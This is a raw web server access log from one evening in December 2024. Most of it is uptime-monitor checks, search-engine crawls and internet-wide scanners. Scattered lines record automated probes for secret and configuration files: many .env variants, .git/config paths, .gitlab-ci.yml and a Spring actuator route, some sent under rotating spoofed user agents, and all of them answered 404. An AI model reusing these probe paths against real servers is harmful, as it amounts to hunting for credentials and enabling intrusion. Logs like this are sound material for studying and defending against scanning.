92.255.57.58 - - [01/Dec/2024:21:02:45 +0100] "GET /actuator/gateway/routes HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [01/Dec/2024:21:03:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:21:04:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.76.94.12 - - [01/Dec/2024:21:04:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [01/Dec/2024:21:05:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:21:06:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:21:07:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:21:08:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:21:09:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:21:10:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
66.249.66.89 - - [01/Dec/2024:21:10:30 +0100] "GET /ftp.modeinstitut-berlin.de/phptmp/ HTTP/1.1" 404 350 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.87 - - [01/Dec/2024:21:11:12 +0100] "GET /ftp.druckerei-braul.de/log/ HTTP/1.1" 404 343 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.91.246.72 - - [01/Dec/2024:21:11:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:21:12:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
66.249.66.88 - - [01/Dec/2024:21:12:25 +0100] "GET /chat.f-m-shop.de/ssl/ HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.91.246.72 - - [01/Dec/2024:21:13:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:21:14:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
92.255.57.58 - - [01/Dec/2024:21:14:52 +0100] "\x16\x03\x01\x05\xa8\x01" 501 321 "-" "-"
212.91.246.72 - - [01/Dec/2024:21:15:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.94.145.110 - - [01/Dec/2024:21:15:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.145.110 - - [01/Dec/2024:21:15:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.110 - - [01/Dec/2024:21:15:25 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.110 - - [01/Dec/2024:21:15:25 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
92.255.57.58 - - [01/Dec/2024:21:15:29 +0100] "\x16\x03\x01\x05\xa8\x01" 501 321 "-" "-"
212.91.246.72 - - [01/Dec/2024:21:16:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
195.116.52.221 - - [01/Dec/2024:21:17:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [01/Dec/2024:21:17:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.248 - - [01/Dec/2024:21:17:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Dec/2024:21:18:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:21:19:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.235.24.240 - - [01/Dec/2024:21:19:20 +0100] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
80.82.77.202 - - [01/Dec/2024:21:19:32 +0100] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
92.255.57.58 - - [01/Dec/2024:21:20:16 +0100] "\x16\x03\x01\x05\xa8\x01" 501 321 "-" "-"
212.91.246.72 - - [01/Dec/2024:21:20:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.163.250 - - [01/Dec/2024:21:21:10 +0100] "\x16\x03\x01" 501 318 "-" "-"
179.43.163.250 - - [01/Dec/2024:21:21:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
179.43.163.250 - - [01/Dec/2024:21:21:10 +0100] "HELP" 501 319 "-" "-"
179.43.163.250 - - [01/Dec/2024:21:21:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "l9tcpid/v1.1.0"
179.43.163.250 - - [01/Dec/2024:21:21:11 +0100] "GET /.env.dev.local HTTP/1.1" 404 319 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:21:21:12 +0100] "GET /.env.stage HTTP/1.1" 404 315 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:21:21:12 +0100] "GET /project/.git/config HTTP/1.1" 404 324 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:21:21:13 +0100] "GET /admin/.git/config HTTP/1.1" 404 322 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:21:21:14 +0100] "GET /.env.dev HTTP/1.1" 404 313 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:21:21:14 +0100] "GET /.env.testing.local HTTP/1.1" 404 323 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:21:21:14 +0100] "GET /.env.ci HTTP/1.1" 404 312 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:21:21:14 +0100] "GET /app/.git/config HTTP/1.1" 404 320 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:21:21:15 +0100] "GET /api/.git/config HTTP/1.1" 404 320 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:21:21:15 +0100] "GET /.env.config HTTP/1.1" 404 316 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:21:21:16 +0100] "GET /.env.sandbox HTTP/1.1" 404 317 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:21:21:16 +0100] "GET /.env.secret HTTP/1.1" 404 316 "-" "l9explore/1.2.2"
212.91.246.72 - - [01/Dec/2024:21:21:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.94.146.49 - - [01/Dec/2024:21:21:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.146.49 - - [01/Dec/2024:21:21:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.49 - - [01/Dec/2024:21:21:50 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.49 - - [01/Dec/2024:21:21:50 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
95.214.55.79 - - [01/Dec/2024:21:22:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [01/Dec/2024:21:22:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.248 - - [01/Dec/2024:21:22:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
95.214.55.79 - - [01/Dec/2024:21:23:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [01/Dec/2024:21:23:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
66.249.66.89 - - [01/Dec/2024:21:23:51 +0100] "GET /web31/ HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
38.175.141.132 - - [01/Dec/2024:21:23:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
212.91.246.72 - - [01/Dec/2024:21:24:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
66.249.66.87 - - [01/Dec/2024:21:24:23 +0100] "GET /web47/web/documents/Strassenreinigungssatzung_Schwaneneck.pdf HTTP/1.1" 404 377 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.91.246.72 - - [01/Dec/2024:21:25:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.55.79 - - [01/Dec/2024:21:25:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [01/Dec/2024:21:26:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:21:27:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
66.249.66.87 - - [01/Dec/2024:21:27:30 +0100] "GET /www.mbingenieure.de/ HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.91.246.72 - - [01/Dec/2024:21:28:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
92.255.57.58 - - [01/Dec/2024:21:28:32 +0100] "\x16\x03\x01\x05\xa8\x01" 501 321 "-" "-"
179.43.163.250 - - [01/Dec/2024:21:28:49 +0100] "\x16\x03\x01" 501 318 "-" "-"
179.43.163.250 - - [01/Dec/2024:21:28:49 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
179.43.163.250 - - [01/Dec/2024:21:28:49 +0100] "HELP" 501 319 "-" "-"
179.43.163.250 - - [01/Dec/2024:21:28:49 +0100] "GET / HTTP/1.1" 200 1229 "-" "l9tcpid/v1.1.0"
179.43.163.250 - - [01/Dec/2024:21:28:49 +0100] "GET /.env.aws HTTP/1.1" 404 313 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:21:28:51 +0100] "GET /.env.docker HTTP/1.1" 404 316 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:21:28:51 +0100] "GET /configuration/.env HTTP/1.1" 404 323 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:21:28:51 +0100] "GET /app/.git/config HTTP/1.1" 404 320 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:21:28:51 +0100] "GET /www/.git/config HTTP/1.1" 404 320 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:21:28:51 +0100] "GET /.env.prod.local HTTP/1.1" 404 320 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:21:28:52 +0100] "GET /config/.env HTTP/1.1" 404 316 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:21:28:52 +0100] "GET /public/.git/config HTTP/1.1" 404 323 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:21:28:52 +0100] "GET /.env.dev HTTP/1.1" 404 313 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:21:28:52 +0100] "GET /.env_sample HTTP/1.1" 404 316 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:21:28:53 +0100] "GET /.env.staging.local HTTP/1.1" 404 323 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:21:28:53 +0100] "GET /prod/.env HTTP/1.1" 404 314 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:21:28:53 +0100] "GET /.gitlab-ci.yml HTTP/1.1" 404 319 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:21:28:54 +0100] "GET /files/.git/config HTTP/1.1" 404 322 "-" "l9explore/1.2.2"
212.91.246.72 - - [01/Dec/2024:21:29:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:21:30:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
92.255.57.58 - - [01/Dec/2024:21:30:57 +0100] "\x16\x03\x01\x05\xa8\x01" 501 321 "-" "-"
212.91.246.72 - - [01/Dec/2024:21:31:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:21:32:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
92.255.57.58 - - [01/Dec/2024:21:32:36 +0100] "\x16\x03\x01\x05\xa8\x01" 501 321 "-" "-"
66.249.66.88 - - [01/Dec/2024:21:32:42 +0100] "GET /localhost/log/2008/10/ HTTP/1.1" 404 338 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
95.214.55.79 - - [01/Dec/2024:21:33:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [01/Dec/2024:21:33:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.55.79 - - [01/Dec/2024:21:33:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [01/Dec/2024:21:34:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
66.249.66.87 - - [01/Dec/2024:21:34:26 +0100] "GET /web24/log/2012/05/ HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.87 - - [01/Dec/2024:21:34:33 +0100] "GET /www.personal-dienstleistung.de/ HTTP/1.1" 404 347 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.91.246.72 - - [01/Dec/2024:21:35:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
147.185.132.72 - - [01/Dec/2024:21:35:25 +0100] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
147.185.132.72 - - [01/Dec/2024:21:36:10 +0100] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [01/Dec/2024:21:36:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:21:37:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
92.255.57.58 - - [01/Dec/2024:21:37:32 +0100] "\x16\x03\x01\x05\xa8\x01" 501 321 "-" "-"
92.255.57.58 - - [01/Dec/2024:21:37:48 +0100] "\x16\x03\x01\x05\xa8\x01" 501 321 "-" "-"
212.91.246.72 - - [01/Dec/2024:21:38:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:21:39:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
125.229.179.205 - - [01/Dec/2024:21:39:42 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
92.255.57.58 - - [01/Dec/2024:21:40:08 +0100] "\x16\x03\x01\x05\xa8\x01" 501 321 "-" "-"
8.211.162.45 - - [01/Dec/2024:21:40:14 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [01/Dec/2024:21:40:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
66.249.66.87 - - [01/Dec/2024:21:40:34 +0100] "GET /web12/application/views/scripts/exportdokumente/ HTTP/1.1" 404 364 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
92.255.57.58 - - [01/Dec/2024:21:40:36 +0100] "\x16\x03\x01\x05\xa8\x01" 501 321 "-" "-"
43.163.0.99 - - [01/Dec/2024:21:40:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
212.91.246.72 - - [01/Dec/2024:21:41:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:21:42:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
66.249.66.87 - - [01/Dec/2024:21:43:23 +0100] "GET /www.alle-ziele-spedition.de/library/Zend/Locale/Data/ HTTP/1.1" 404 369 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.91.246.72 - - [01/Dec/2024:21:43:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.98.11.35 - - [01/Dec/2024:21:43:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
87.120.113.56 - - [01/Dec/2024:21:44:13 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
87.120.113.56 - - [01/Dec/2024:21:44:15 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36 OPR/60.0.3255.109"
87.120.113.56 - - [01/Dec/2024:21:44:15 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; Android 9; REVVLRY) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
141.98.11.35 - - [01/Dec/2024:21:44:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
87.120.113.56 - - [01/Dec/2024:21:44:21 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; Android 9; HMA-L29) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
212.91.246.72 - - [01/Dec/2024:21:44:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.120.113.56 - - [01/Dec/2024:21:44:41 +0100] "GET /.env HTTP/1.1" 404 309 "-" "SonyEricssonZ800/R1Y Browser/SEMC-Browser/4.1 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0"
212.91.246.72 - - [01/Dec/2024:21:45:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.120.113.56 - - [01/Dec/2024:21:45:37 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 1.5; fr-fr; GT-I5700 Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1"
87.120.113.56 - - [01/Dec/2024:21:45:38 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; Android 7.0; XT1585) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.101 Mobile Safari/537.36"
87.120.113.56 - - [01/Dec/2024:21:45:38 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36"
87.120.113.56 - - [01/Dec/2024:21:45:55 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 OPR/62.0.3331.116"
87.120.113.56 - - [01/Dec/2024:21:46:01 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
87.120.113.56 - - [01/Dec/2024:21:46:23 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Avant Browser/1.2.789rel1 (http://www.avantbrowser.com)"
87.120.113.56 - - [01/Dec/2024:21:46:23 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; Android 9; SM-G970U1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
87.120.113.56 - - [01/Dec/2024:21:46:23 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
212.91.246.72 - - [01/Dec/2024:21:46:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.120.113.56 - - [01/Dec/2024:21:46:35 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux i686; rv:20.0) Gecko/20100101 Firefox/20.0"
87.120.113.56 - - [01/Dec/2024:21:46:52 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 OPR/62.0.3331.116"
87.120.113.56 - - [01/Dec/2024:21:46:52 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; Android 5.1.1; Nexus 7 Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.93524"
87.120.113.56 - - [01/Dec/2024:21:46:52 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; Android 8.0.0; HTC U11) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
87.120.113.56 - - [01/Dec/2024:21:46:59 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36 Vivaldi/1.0.344.37"
87.120.113.56 - - [01/Dec/2024:21:46:59 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36"
87.120.113.56 - - [01/Dec/2024:21:47:03 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/4.0 (PSP (PlayStation Portable); 2.00)"
212.91.246.72 - - [01/Dec/2024:21:47:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:21:48:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:21:49:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:21:50:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:21:51:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
